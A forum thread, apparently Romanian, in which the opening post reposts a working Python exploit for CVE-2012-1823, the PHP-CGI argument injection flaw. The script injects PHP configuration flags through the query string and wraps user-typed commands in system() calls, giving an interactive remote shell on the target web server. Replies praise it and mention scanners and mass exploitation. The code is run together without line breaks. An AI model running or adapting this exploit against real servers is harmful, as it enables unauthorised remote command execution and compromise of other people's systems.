Nytro Posted January 3, 2013 Report Posted January 3, 2013 PHP-CGI Argument Injection Remote Code Execution#!/usr/bin/pythonimport requestsimport sysprint """CVE-2012-1823 PHP-CGI Arguement Injection Remote Code ExecutionThis exploit abuses an arguement injection in the PHP-CGI wrapperto execute code as the PHP user/webserver user.Feel free to give me abuse about this <3- infodox | insecurety.net | @info_dox"""if len(sys.argv) != 2:print "Usage: ./cve-2012-1823.py <target>"sys.exit(0)target = sys.argv[1]url = """http://""" + target +"""/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""lol = """<?php system('"""lol2 = """');die(); ?>"""print "[+] Connecting and spawning a shell..."while True:try:bobcat = raw_input("%s:~$ " %(target))lulz = lol + bobcat + lol2hax = requests.post(url, lulz)print hax.textexcept KeyboardInterrupt:print "\n[-] Quitting"sys.exit(1)Sursa: PHP-CGI Argument Injection Remote Code Execution - CXSecurity WLB Quote
nAb.h4x Posted January 4, 2013 Report Posted January 4, 2013 Nice OFF: Tare ar fi sa gasim un Remote Code Execution in Google ) Quote
ilbr22 Posted January 4, 2013 Report Posted January 4, 2013 am eu scanner pentru el nu prinde cine stie ce... Quote
wind Posted January 7, 2013 Report Posted January 7, 2013 am eu scanner pentru el nu prinde cine stie ce...E cam varza, am facut si eu un mass .. Quote